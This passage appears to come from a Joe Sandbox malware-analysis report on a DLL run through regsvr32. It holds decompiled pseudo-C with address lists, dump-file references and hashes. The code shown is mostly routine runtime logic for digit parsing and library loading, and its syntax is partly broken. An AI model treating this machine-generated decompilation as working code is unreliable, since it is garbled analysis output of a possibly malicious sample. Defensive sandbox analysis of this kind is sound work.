                                                                                                        				if (_t199 - (_t199 & 0x0000ffff) - r9d < 0) goto 0x123d8cef;
                                                                                                        				if (_t199 - _a16 >= 0) goto 0x123d8be3;
                                                                                                        				goto 0x123d8cea;
                                                                                                        				if (_t199 - _v152 < 0) goto 0x123d8cef;
                                                                                                        				if (_t199 - _v148 < 0) goto 0x123d8b34;
                                                                                                        				if (_t199 - _v144 < 0) goto 0x123d8cef;
                                                                                                        				if (_t199 - _v140 < 0) goto 0x123d8b34;
                                                                                                        				if (_t199 - _v136 < 0) goto 0x123d8cef;
                                                                                                        				if (_t199 - _v132 < 0) goto 0x123d8b34;
                                                                                                        				if (_t199 - _v128 < 0) goto 0x123d8cef;
                                                                                                        				if (_t199 - _v124 < 0) goto 0x123d8b34;
                                                                                                        				if (_t199 - _v120 < 0) goto 0x123d8cef;
                                                                                                        				if (_t199 - _v116 < 0) goto 0x123d8b34;
                                                                                                        				if (_t199 - _v112 < 0) goto 0x123d8cef;
                                                                                                        				if (_t199 - _v108 < 0) goto 0x123d8b34;
                                                                                                        				if (_t199 - _v104 < 0) goto 0x123d8cef;
                                                                                                        				if (_t199 - _v100 < 0) goto 0x123d8b34;
                                                                                                        				if (_t199 - _v96 < 0) goto 0x123d8cef;
                                                                                                        				if (_t199 - _v92 < 0) goto 0x123d8b34;
                                                                                                        				if (_t199 - _v88 < 0) goto 0x123d8cef;
                                                                                                        				if (_t199 - _v84 < 0) goto 0x123d8b34;
                                                                                                        				if (_t199 - _v80 < 0) goto 0x123d8cef;
                                                                                                        				if (_t199 - _v76 < 0) goto 0x123d8b34;
                                                                                                        				if ((_t199 & 0x0000ffff) - _v72 - 9 > 0) goto 0x123d8cef;
                                                                                                        				goto 0x123d8b34;
                                                                                                        				if (_t199 - _v68 >= 0) goto 0x123d8cef;
                                                                                                        				if ((_t199 & 0x0000ffff) - 0xff10 != 0xffffffff) goto 0x123d8d11;
                                                                                                        				_t64 = _t389 - 0x41; // -17
                                                                                                        				_t65 = _t389 - 0x61; // -49
                                                                                                        				_t155 = _t65;
                                                                                                        				if (_t64 - 0x19 <= 0) goto 0x123d8d06;
                                                                                                        				if (_t155 - 0x19 > 0) goto 0x123d8d91;
                                                                                                        				if (_t155 - 0x19 > 0) goto 0x123d8d0e;
                                                                                                        				_t66 = _t389 - 0x37; // -231
                                                                                                        				if (_t66 != 0) goto 0x123d8d91;
                                                                                                        				_t390 =  *_t397;
                                                                                                        				r9d = 0xffdf;
                                                                                                        				_t250 =  *_t390 & 0x0000ffff;
                                                                                                        				_t67 =  &(_t390[1]); // 0xffe1
                                                                                                        				_t404 = _t67;
                                                                                                        				 *_t397 = _t404;
                                                                                                        				_t68 = _t394 - 0x58; // 0x698
                                                                                                        				if ((r9w & _t68) == 0) goto 0x123d8d79;
                                                                                                        				 *_t397 = _t390;
                                                                                                        				_t159 =  !=  ? r14d : 8;
                                                                                                        				r14d =  !=  ? r14d : 8;
                                                                                                        				if (_t250 == 0) goto 0x123d8d71;
                                                                                                        				if ( *_t390 == _t250) goto 0x123d8d71;
                                                                                                        				E00007FFC7FFC123DB420(_t381);
                                                                                                        				 *_t381 = 0x16;
                                                                                                        				E00007FFC7FFC123D9744();
                                                                                                        				r8d = 0x660;
                                                                                                        				r10d = 0x6f0;
                                                                                                        				r11d = 0x966;
                                                                                                        				goto 0x123d8da0;
                                                                                                        				r8d = 0x660;
                                                                                                        				goto 0x123d8da0;
                                                                                                        				_t200 =  *_t404 & 0x0000ffff;
                                                                                                        				_t71 =  &(_t404[1]); // 0xffe3
                                                                                                        				_t382 = _t71;
                                                                                                        				 *_t397 = _t382;
                                                                                                        				r8d = 0x660;
                                                                                                        				goto 0x123d8d96;
                                                                                                        				_t164 =  !=  ? r14d : 0xa;
                                                                                                        				r14d = 0xa;
                                                                                                        				_t165 = ( !=  ? r14d : 0xa) | 0xffffffff;
                                                                                                        				_t73 = (( !=  ? r14d : 0xa) | 0xffffffff) % r14d;
                                                                                                        				_t252 = (( !=  ? r14d : 0xa) | 0xffffffff) % r14d;
                                                                                                        				r12d = 0x30;
                                                                                                        				r15d = 0xff10;
                                                                                                        				r9d = 0xa / r14d;
                                                                                                        				if (_t200 - r12w < 0) goto 0x123d8f70;
                                                                                                        				if (_t200 - 0x3a >= 0) goto 0x123d8dd2;
                                                                                                        				goto 0x123d8f6b;
                                                                                                        				if (_t200 - r15w >= 0) goto 0x123d8f5b;
                                                                                                        				if (_t200 - r8w < 0) goto 0x123d8f70;
                                                                                                        				if (_t200 - 0x66a >= 0) goto 0x123d8dfb;
                                                                                                        				goto 0x123d8f6b;
                                                                                                        				if (_t200 - r10w < 0) goto 0x123d8f70;
                                                                                                        				if (_t200 - 0x6fa >= 0) goto 0x123d8e1a;
                                                                                                        				goto 0x123d8f6b;
                                                                                                        				if (_t200 - r11w < 0) goto 0x123d8f70;
                                                                                                        				if (_t200 - 0x970 >= 0) goto 0x123d8e39;
                                                                                                        				goto 0x123d8f6b;
                                                                                                        				if (_t200 - 0x9e6 < 0) goto 0x123d8f70;
                                                                                                        				_t76 =  &(_t382[5]); // 0x9f0
                                                                                                        				if (_t200 - _t76 >= 0) goto 0x123d8e59;
                                                                                                        				goto 0x123d8f6b;
                                                                                                        				if (_t200 - 0xa66 < 0) goto 0x123d8f70;
                                                                                                        				if (_t200 - _a16 < 0) goto 0x123d8e4f;
                                                                                                        				if (_t200 - _v152 < 0) goto 0x123d8f70;
                                                                                                        				if (_t200 - _v148 < 0) goto 0x123d8e4f;
                                                                                                        				if (_t200 - _v144 < 0) goto 0x123d8f70;
                                                                                                        				if (_t200 - _v140 < 0) goto 0x123d8e4f;
                                                                                                        				if (_t200 - _v136 < 0) goto 0x123d8f70;
                                                                                                        				if (_t200 - _v132 < 0) goto 0x123d8e4f;
                                                                                                        				if (_t200 - _v128 < 0) goto 0x123d8f70;
                                                                                                        				if (_t200 - _v124 < 0) goto 0x123d8e4f;
                                                                                                        				if (_t200 - _v120 < 0) goto 0x123d8f70;
                                                                                                        				if (_t200 - _v116 < 0) goto 0x123d8e4f;
                                                                                                        				if (_t200 - _v112 < 0) goto 0x123d8f70;
                                                                                                        				if (_t200 - _v108 < 0) goto 0x123d8e4f;
                                                                                                        				if (_t200 - _v104 < 0) goto 0x123d8f70;
                                                                                                        				if (_t200 - _v100 < 0) goto 0x123d8e4f;
                                                                                                        				if (_t200 - _v96 < 0) goto 0x123d8f70;
                                                                                                        				if (_t200 - _v92 < 0) goto 0x123d8e4f;
                                                                                                        				if (_t200 - _v88 < 0) goto 0x123d8f70;
                                                                                                        				if (_t200 - _v84 < 0) goto 0x123d8e4f;
                                                                                                        				if (_t200 - _v80 < 0) goto 0x123d8f70;
                                                                                                        				if (_t200 - _v76 < 0) goto 0x123d8e4f;
                                                                                                        				if ((_t200 & 0x0000ffff) - _v72 - 9 > 0) goto 0x123d8f70;
                                                                                                        				goto 0x123d8f6b;
                                                                                                        				if (_t200 - _v68 >= 0) goto 0x123d8f70;
                                                                                                        				if ((_t200 & 0x0000ffff) - r15d != 0xffffffff) goto 0x123d8f93;
                                                                                                        				_t100 = _t390 - 0x41; // -65
                                                                                                        				_t101 = _t390 - 0x61; // -97
                                                                                                        				_t185 = _t101;
                                                                                                        				if (_t100 - 0x19 <= 0) goto 0x123d8f83;
                                                                                                        				if (_t185 - 0x19 > 0) goto 0x123d8f90;
                                                                                                        				if (_t185 - 0x19 > 0) goto 0x123d8f8b;
                                                                                                        				goto 0x123d8f93;
                                                                                                        				_t405 =  *_t397;
                                                                                                        				if (((_t200 & 0x0000ffff) + 0x1ffffffa9 | 0xffffffff) - r14d >= 0) goto 0x123d8fd7;
                                                                                                        				_t201 =  *_t405 & 0x0000ffff;
                                                                                                        				_t254 = _t382 + _t390;
                                                                                                        				_t261 = _t254;
                                                                                                        				_t107 =  &(_t405[1]); // 0x2
                                                                                                        				r8d = 0x660;
                                                                                                        				 *_t397 = _t107;
                                                                                                        				_t258 = ( !=  ? _t255 : _t255 | 0x00000002) | (r13d & 0xffffff00 | _t254 - r13d * r14d > 0x00000000 | r13d & 0xffffff00 | _t260 - r9d > 0x00000000) << 0x00000002 | 0x00000008;
                                                                                                        				goto 0x123d8db7;
                                                                                                        				_t409 = _a8;
                                                                                                        				_t109 = _t405 - 2; // -2
                                                                                                        				_t384 = _t109;
                                                                                                        				_t407 = _v64;
                                                                                                        				 *_t397 = _t384;
                                                                                                        				if (_t201 == 0) goto 0x123d9008;
                                                                                                        				if ( *_t384 == _t201) goto 0x123d9008;
                                                                                                        				E00007FFC7FFC123DB420(_t384);
                                                                                                        				 *_t384 = 0x16;
                                                                                                        				E00007FFC7FFC123D9744();
                                                                                                        				if ((sil & 0x00000008) != 0) goto 0x123d9024;
                                                                                                        				_t385 = _t397[1];
                                                                                                        				 *_t397 = _t407;
                                                                                                        				if (_t385 == 0) goto 0x123d901d;
                                                                                                        				 *_t385 = _t407;
                                                                                                        				goto 0x123d90a8;
                                                                                                        				r8d = 0x80000000;
                                                                                                        				_t114 = _t405 - 1; // -1
                                                                                                        				r9d = _t114;
                                                                                                        				if ((sil & 0x00000004) != 0) goto 0x123d904c;
                                                                                                        				if ((sil & 0x00000001) == 0) goto 0x123d908f;
                                                                                                        				if ((sil & 0x00000002) == 0) goto 0x123d9047;
                                                                                                        				if (_t261 - r8d <= 0) goto 0x123d9095;
                                                                                                        				goto 0x123d904c;
                                                                                                        				if (_t261 - r9d <= 0) goto 0x123d9097;
                                                                                                        				 *((char*)(_t409 + 0x30)) = 1;
                                                                                                        				 *((intOrPtr*)(_t409 + 0x2c)) = 0x22;
                                                                                                        				if ((_t258 & 0x00000001) != 0) goto 0x123d9067;
                                                                                                        				goto 0x123d9097;
                                                                                                        				_t395 = _t397[1];
                                                                                                        				if ((_t258 & 0x00000002) == 0) goto 0x123d907f;
                                                                                                        				if (_t395 == 0) goto 0x123d907a;
                                                                                                        				 *_t395 =  *_t397;
                                                                                                        				goto 0x123d90a8;
                                                                                                        				if (_t395 == 0) goto 0x123d908a;
                                                                                                        				 *_t395 =  *_t397;
                                                                                                        				goto 0x123d90a8;
                                                                                                        				if ((sil & 0x00000002) == 0) goto 0x123d9097;
                                                                                                        				_t396 = _t397[1];
                                                                                                        				if (_t396 == 0) goto 0x123d90a6;
                                                                                                        				 *_t396 =  *_t397;
                                                                                                        				return  ~(_t261 | 0xffffffff);
                                                                                                        			}





























































                                                                                                        0x7ffc123d893c
                                                                                                        0x7ffc123d893c
                                                                                                        0x7ffc123d893c
                                                                                                        0x7ffc123d893c
                                                                                                        0x7ffc123d8941
                                                                                                        0x7ffc123d8958
                                                                                                        0x7ffc123d895b
                                                                                                        0x7ffc123d895e
                                                                                                        0x7ffc123d8962
                                                                                                        0x7ffc123d8965
                                                                                                        0x7ffc123d896d
                                                                                                        0x7ffc123d8973
                                                                                                        0x7ffc123d8975
                                                                                                        0x7ffc123d897a
                                                                                                        0x7ffc123d8980
                                                                                                        0x7ffc123d8985
                                                                                                        0x7ffc123d898a
                                                                                                        0x7ffc123d898c
                                                                                                        0x7ffc123d8993
                                                                                                        0x7ffc123d8995
                                                                                                        0x7ffc123d899a
                                                                                                        0x7ffc123d899d
                                                                                                        0x7ffc123d89a1
                                                                                                        0x7ffc123d89a4
                                                                                                        0x7ffc123d89af
                                                                                                        0x7ffc123d89b4
                                                                                                        0x7ffc123d89b9
                                                                                                        0x7ffc123d89c0
                                                                                                        0x7ffc123d89c9
                                                                                                        0x7ffc123d89cc
                                                                                                        0x7ffc123d89db
                                                                                                        0x7ffc123d89de
                                                                                                        0x7ffc123d89e5
                                                                                                        0x7ffc123d89e7
                                                                                                        0x7ffc123d89ec
                                                                                                        0x7ffc123d89ee
                                                                                                        0x7ffc123d89f8
                                                                                                        0x7ffc123d8a0a
                                                                                                        0x7ffc123d8a1a
                                                                                                        0x7ffc123d8a23
                                                                                                        0x7ffc123d8a25
                                                                                                        0x7ffc123d8a28
                                                                                                        0x7ffc123d8a2b
                                                                                                        0x7ffc123d8a2f
                                                                                                        0x7ffc123d8a32
                                                                                                        0x7ffc123d8a42
                                                                                                        0x7ffc123d8a4f
                                                                                                        0x7ffc123d8a5c
                                                                                                        0x7ffc123d8a64
                                                                                                        0x7ffc123d8a6a
                                                                                                        0x7ffc123d8a72
                                                                                                        0x7ffc123d8a72
                                                                                                        0x7ffc123d8a76
                                                                                                        0x7ffc123d8a7e
                                                                                                        0x7ffc123d8a84
                                                                                                        0x7ffc123d8a8c
                                                                                                        0x7ffc123d8a92
                                                                                                        0x7ffc123d8a9a
                                                                                                        0x7ffc123d8aa2
                                                                                                        0x7ffc123d8aaa
                                                                                                        0x7ffc123d8ab2
                                                                                                        0x7ffc123d8aba
                                                                                                        0x7ffc123d8ac2
                                                                                                        0x7ffc123d8aca
                                                                                                        0x7ffc123d8ad2
                                                                                                        0x7ffc123d8ada
                                                                                                        0x7ffc123d8ae2
                                                                                                        0x7ffc123d8aea
                                                                                                        0x7ffc123d8af2
                                                                                                        0x7ffc123d8afa
                                                                                                        0x7ffc123d8b02
                                                                                                        0x7ffc123d8b0d
                                                                                                        0x7ffc123d8b1f
                                                                                                        0x7ffc123d8b28
                                                                                                        0x7ffc123d8b32
                                                                                                        0x7ffc123d8b39
                                                                                                        0x7ffc123d8b41
                                                                                                        0x7ffc123d8b4b
                                                                                                        0x7ffc123d8b59
                                                                                                        0x7ffc123d8b61
                                                                                                        0x7ffc123d8b6a
                                                                                                        0x7ffc123d8b78
                                                                                                        0x7ffc123d8b80
                                                                                                        0x7ffc123d8b89
                                                                                                        0x7ffc123d8b97
                                                                                                        0x7ffc123d8b9f
                                                                                                        0x7ffc123d8ba8
                                                                                                        0x7ffc123d8bb6
                                                                                                        0x7ffc123d8bbe
                                                                                                        0x7ffc123d8bc6
                                                                                                        0x7ffc123d8bd4
                                                                                                        0x7ffc123d8bde
                                                                                                        0x7ffc123d8bea
                                                                                                        0x7ffc123d8bf5
                                                                                                        0x7ffc123d8c02
                                                                                                        0x7ffc123d8c0d
                                                                                                        0x7ffc123d8c1a
                                                                                                        0x7ffc123d8c25
                                                                                                        0x7ffc123d8c32
                                                                                                        0x7ffc123d8c3d
                                                                                                        0x7ffc123d8c4a
                                                                                                        0x7ffc123d8c55
                                                                                                        0x7ffc123d8c62
                                                                                                        0x7ffc123d8c6d
                                                                                                        0x7ffc123d8c7a
                                                                                                        0x7ffc123d8c81
                                                                                                        0x7ffc123d8c8e
                                                                                                        0x7ffc123d8c95
                                                                                                        0x7ffc123d8ca2
                                                                                                        0x7ffc123d8ca9
                                                                                                        0x7ffc123d8cb6
                                                                                                        0x7ffc123d8cbd
                                                                                                        0x7ffc123d8cd4
                                                                                                        0x7ffc123d8cd6
                                                                                                        0x7ffc123d8ce3
                                                                                                        0x7ffc123d8ced
                                                                                                        0x7ffc123d8cf2
                                                                                                        0x7ffc123d8cf8
                                                                                                        0x7ffc123d8cf8
                                                                                                        0x7ffc123d8cfb
                                                                                                        0x7ffc123d8d00
                                                                                                        0x7ffc123d8d09
                                                                                                        0x7ffc123d8d0e
                                                                                                        0x7ffc123d8d13
                                                                                                        0x7ffc123d8d15
                                                                                                        0x7ffc123d8d18
                                                                                                        0x7ffc123d8d1e
                                                                                                        0x7ffc123d8d21
                                                                                                        0x7ffc123d8d21
                                                                                                        0x7ffc123d8d25
                                                                                                        0x7ffc123d8d28
                                                                                                        0x7ffc123d8d2f
                                                                                                        0x7ffc123d8d34
                                                                                                        0x7ffc123d8d3c
                                                                                                        0x7ffc123d8d40
                                                                                                        0x7ffc123d8d46
                                                                                                        0x7ffc123d8d4b
                                                                                                        0x7ffc123d8d4d
                                                                                                        0x7ffc123d8d52
                                                                                                        0x7ffc123d8d58
                                                                                                        0x7ffc123d8d5d
                                                                                                        0x7ffc123d8d63
                                                                                                        0x7ffc123d8d69
                                                                                                        0x7ffc123d8d6f
                                                                                                        0x7ffc123d8d71
                                                                                                        0x7ffc123d8d77
                                                                                                        0x7ffc123d8d79
                                                                                                        0x7ffc123d8d7d
                                                                                                        0x7ffc123d8d7d
                                                                                                        0x7ffc123d8d81
                                                                                                        0x7ffc123d8d84
                                                                                                        0x7ffc123d8d8f
                                                                                                        0x7ffc123d8d99
                                                                                                        0x7ffc123d8d9d
                                                                                                        0x7ffc123d8da2
                                                                                                        0x7ffc123d8da5
                                                                                                        0x7ffc123d8da5
                                                                                                        0x7ffc123d8da8
                                                                                                        0x7ffc123d8dae
                                                                                                        0x7ffc123d8db4
                                                                                                        0x7ffc123d8dbb
                                                                                                        0x7ffc123d8dc5
                                                                                                        0x7ffc123d8dcd
                                                                                                        0x7ffc123d8dd6
                                                                                                        0x7ffc123d8de0
                                                                                                        0x7ffc123d8dee
                                                                                                        0x7ffc123d8df6
                                                                                                        0x7ffc123d8dff
                                                                                                        0x7ffc123d8e0d
                                                                                                        0x7ffc123d8e15
                                                                                                        0x7ffc123d8e1e
                                                                                                        0x7ffc123d8e2c
                                                                                                        0x7ffc123d8e34
                                                                                                        0x7ffc123d8e41
                                                                                                        0x7ffc123d8e47
                                                                                                        0x7ffc123d8e4d
                                                                                                        0x7ffc123d8e54
                                                                                                        0x7ffc123d8e61
                                                                                                        0x7ffc123d8e6f
                                                                                                        0x7ffc123d8e78
                                                                                                        0x7ffc123d8e83
                                                                                                        0x7ffc123d8e8c
                                                                                                        0x7ffc123d8e97
                                                                                                        0x7ffc123d8ea0
                                                                                                        0x7ffc123d8eab
                                                                                                        0x7ffc123d8eb4
                                                                                                        0x7ffc123d8ebf
                                                                                                        0x7ffc123d8ec8
                                                                                                        0x7ffc123d8ed3
                                                                                                        0x7ffc123d8ee0
                                                                                                        0x7ffc123d8eeb
                                                                                                        0x7ffc123d8ef8
                                                                                                        0x7ffc123d8eff
                                                                                                        0x7ffc123d8f0c
                                                                                                        0x7ffc123d8f13
                                                                                                        0x7ffc123d8f20
                                                                                                        0x7ffc123d8f27
                                                                                                        0x7ffc123d8f34
                                                                                                        0x7ffc123d8f3b
                                                                                                        0x7ffc123d8f52
                                                                                                        0x7ffc123d8f59
                                                                                                        0x7ffc123d8f63
                                                                                                        0x7ffc123d8f6e
                                                                                                        0x7ffc123d8f73
                                                                                                        0x7ffc123d8f79
                                                                                                        0x7ffc123d8f79
                                                                                                        0x7ffc123d8f7c
                                                                                                        0x7ffc123d8f81
                                                                                                        0x7ffc123d8f86
                                                                                                        0x7ffc123d8f8e
                                                                                                        0x7ffc123d8f93
                                                                                                        0x7ffc123d8f99
                                                                                                        0x7ffc123d8f9b
                                                                                                        0x7ffc123d8fa5
                                                                                                        0x7ffc123d8fb6
                                                                                                        0x7ffc123d8fbd
                                                                                                        0x7ffc123d8fc4
                                                                                                        0x7ffc123d8fcd
                                                                                                        0x7ffc123d8fd0
                                                                                                        0x7ffc123d8fd2
                                                                                                        0x7ffc123d8fd7
                                                                                                        0x7ffc123d8fdf
                                                                                                        0x7ffc123d8fdf
                                                                                                        0x7ffc123d8fe3
                                                                                                        0x7ffc123d8feb
                                                                                                        0x7ffc123d8ff1
                                                                                                        0x7ffc123d8ff6
                                                                                                        0x7ffc123d8ff8
                                                                                                        0x7ffc123d8ffd
                                                                                                        0x7ffc123d9003
                                                                                                        0x7ffc123d900c
                                                                                                        0x7ffc123d900e
                                                                                                        0x7ffc123d9012
                                                                                                        0x7ffc123d9018
                                                                                                        0x7ffc123d901a
                                                                                                        0x7ffc123d901f
                                                                                                        0x7ffc123d9024
                                                                                                        0x7ffc123d902a
                                                                                                        0x7ffc123d902a
                                                                                                        0x7ffc123d9032
                                                                                                        0x7ffc123d9038
                                                                                                        0x7ffc123d903e
                                                                                                        0x7ffc123d9043
                                                                                                        0x7ffc123d9045
                                                                                                        0x7ffc123d904a
                                                                                                        0x7ffc123d904e
                                                                                                        0x7ffc123d9056
                                                                                                        0x7ffc123d9060
                                                                                                        0x7ffc123d9065
                                                                                                        0x7ffc123d9067
                                                                                                        0x7ffc123d906d
                                                                                                        0x7ffc123d9072
                                                                                                        0x7ffc123d9077
                                                                                                        0x7ffc123d907d
                                                                                                        0x7ffc123d9082
                                                                                                        0x7ffc123d9087
                                                                                                        0x7ffc123d908d
                                                                                                        0x7ffc123d9093
                                                                                                        0x7ffc123d9097
                                                                                                        0x7ffc123d909e
                                                                                                        0x7ffc123d90a3
                                                                                                        0x7ffc123d90c2

                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.276563362.00007FFC123D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFC123D0000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.276549986.00007FFC123D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.276764696.00007FFC12408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.276799788.00007FFC1244E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.276807230.00007FFC12452000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.276813314.00007FFC12455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.276819668.00007FFC12457000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ffc123d0000_regsvr32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                        • String ID: -$0$f$p$p
                                                                                                        • API String ID: 3215553584-1865143739
                                                                                                        • Opcode ID: 3bf02160523cc795b8287601120242312cc0e9fc0a46e7f1dbb3d85bfcf254c4
                                                                                                        • Instruction ID: a2e378d4f75e0e48cf74f00427c5f748fddad8fa22feda2281feba31f15372f7
                                                                                                        • Opcode Fuzzy Hash: 3bf02160523cc795b8287601120242312cc0e9fc0a46e7f1dbb3d85bfcf254c4
                                                                                                        • Instruction Fuzzy Hash: F412C36DE09A6F85FB20AA14E0042F9665AFBD0764FC44172E68D476C4DFBCF462CB20
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.276563362.00007FFC123D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFC123D0000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.276549986.00007FFC123D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.276764696.00007FFC12408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.276799788.00007FFC1244E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.276807230.00007FFC12452000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.276813314.00007FFC12455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.276819668.00007FFC12457000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ffc123d0000_regsvr32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Object$LineMoveSelect$CreateDeletePolyline
                                                                                                        • String ID:
                                                                                                        • API String ID: 1917832262-0
                                                                                                        • Opcode ID: 43512701d7355e0956f5cb1433a41ae321c0b5e41867a7adc5de44204bc134c7
                                                                                                        • Instruction ID: be943ebc6bd0f2fcc224cb4f94adc0a8ab384bfdd02e028c0347191870de3883
                                                                                                        • Opcode Fuzzy Hash: 43512701d7355e0956f5cb1433a41ae321c0b5e41867a7adc5de44204bc134c7
                                                                                                        • Instruction Fuzzy Hash: BB91FC7A618A448ADB65CB28E05176AF7A5F7C8784F104226DACE97B68DF3CD449CF00
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 77%
                                                                                                        			E00007FFC7FFC123DD8F0(void* __ecx, long long __rbx, void* __rdx, signed int __rsi, void* __r8, void* __r9) {
                                                                                                        				void* _t37;
                                                                                                        				signed long long _t57;
                                                                                                        				intOrPtr _t61;
                                                                                                        				signed long long _t72;
                                                                                                        				void* _t75;
                                                                                                        				signed long long _t76;
                                                                                                        				long long _t82;
                                                                                                        				void* _t86;
                                                                                                        				signed long long _t90;
                                                                                                        				signed long long _t91;
                                                                                                        				WCHAR* _t93;
                                                                                                        				long _t96;
                                                                                                        				void* _t99;
                                                                                                        				WCHAR* _t104;
                                                                                                        
                                                                                                        				 *((long long*)(_t86 + 8)) = __rbx;
                                                                                                        				 *((long long*)(_t86 + 0x10)) = _t82;
                                                                                                        				 *((long long*)(_t86 + 0x18)) = __rsi;
                                                                                                        				r15d = __ecx;
                                                                                                        				_t90 =  *0x1244e008; // 0x2d0c2734ea27
                                                                                                        				_t76 = _t75 | 0xffffffff;
                                                                                                        				_t72 = _t90 ^  *(0x7ffc123d0000 + 0x7f840 + _t104 * 8);
                                                                                                        				asm("dec eax");
                                                                                                        				if (_t72 == _t76) goto 0x123dda36;
                                                                                                        				if (_t72 == 0) goto 0x123dd959;
                                                                                                        				_t57 = _t72;
                                                                                                        				goto 0x123dda38;
                                                                                                        				if (__r8 == __r9) goto 0x123dda1b;
                                                                                                        				_t61 =  *((intOrPtr*)(0x7ffc123d0000 + 0x7f7a0 + __rsi * 8));
                                                                                                        				if (_t61 == 0) goto 0x123dd980;
                                                                                                        				if (_t61 != _t76) goto 0x123dda75;
                                                                                                        				goto 0x123dda07;
                                                                                                        				r8d = 0x800;
                                                                                                        				LoadLibraryExW(_t104, _t99, _t96);
                                                                                                        				if (_t57 != 0) goto 0x123dda55;
                                                                                                        				if (GetLastError() != 0x57) goto 0x123dd9f5;
                                                                                                        				_t14 = _t57 - 0x50; // -80
                                                                                                        				_t37 = _t14;
                                                                                                        				r8d = _t37;
                                                                                                        				if (E00007FFC7FFC123DF5B0(_t90) == 0) goto 0x123dd9f5;
                                                                                                        				r8d = _t37;
                                                                                                        				if (E00007FFC7FFC123DF5B0(_t90) == 0) goto 0x123dd9f5;
                                                                                                        				r8d = 0;
                                                                                                        				LoadLibraryExW(_t93, _t75);
                                                                                                        				if (_t57 != 0) goto 0x123dda55;
                                                                                                        				 *((intOrPtr*)(0x7ffc123d0000 + 0x7f7a0 + __rsi * 8)) = _t76;
                                                                                                        				if (__r8 + 4 != __r9) goto 0x123dd962;
                                                                                                        				_t91 =  *0x1244e008; // 0x2d0c2734ea27
                                                                                                        				asm("dec eax");
                                                                                                        				 *(0x7ffc123d0000 + 0x7f840 + _t104 * 8) = _t76 ^ _t91;
                                                                                                        				return 0;
                                                                                                        			}

















                                                                                                        0x7ffc123dd8f0
                                                                                                        0x7ffc123dd8f5
                                                                                                        0x7ffc123dd8fa
                                                                                                        0x7ffc123dd90c
                                                                                                        0x7ffc123dd927
                                                                                                        0x7ffc123dd92e
                                                                                                        0x7ffc123dd938
                                                                                                        0x7ffc123dd940
                                                                                                        0x7ffc123dd946
                                                                                                        0x7ffc123dd94f
                                                                                                        0x7ffc123dd951
                                                                                                        0x7ffc123dd954
                                                                                                        0x7ffc123dd95c
                                                                                                        0x7ffc123dd965
                                                                                                        0x7ffc123dd970
                                                                                                        0x7ffc123dd975
                                                                                                        0x7ffc123dd97b
                                                                                                        0x7ffc123dd98d
                                                                                                        0x7ffc123dd993
                                                                                                        0x7ffc123dd99f
                                                                                                        0x7ffc123dd9ae
                                                                                                        0x7ffc123dd9b0
                                                                                                        0x7ffc123dd9b0
                                                                                                        0x7ffc123dd9b6
                                                                                                        0x7ffc123dd9c7
                                                                                                        0x7ffc123dd9c9
                                                                                                        0x7ffc123dd9dd
                                                                                                        0x7ffc123dd9df
                                                                                                        0x7ffc123dd9e7
                                                                                                        0x7ffc123dd9f3
                                                                                                        0x7ffc123dd9ff
                                                                                                        0x7ffc123dda0e
                                                                                                        0x7ffc123dda14
                                                                                                        0x7ffc123dda28
                                                                                                        0x7ffc123dda2e
                                                                                                        0x7ffc123dda54

                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.276563362.00007FFC123D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFC123D0000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.276549986.00007FFC123D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.276764696.00007FFC12408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.276799788.00007FFC1244E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.276807230.00007FFC12452000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.276813314.00007FFC12455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.276819668.00007FFC12457000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ffc123d0000_regsvr32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AddressFreeLibraryProc
                                                                                                        • String ID: api-ms-$ext-ms-
                                                                                                        • API String ID: 3013587201-537541572
                                                                                                        • Opcode ID: 0c6698adf364fca3294d1cea9b6c9e04e4170ebc5fe981ec924076e30e6001fe
                                                                                                        • Instruction ID: 1277d3d8771b832bbf6cc2b234296ecba44250c61bde8e712f659d7ba49778b3
                                                                                                        • Opcode Fuzzy Hash: 0c6698adf364fca3294d1cea9b6c9e04e4170ebc5fe981ec924076e30e6001fe
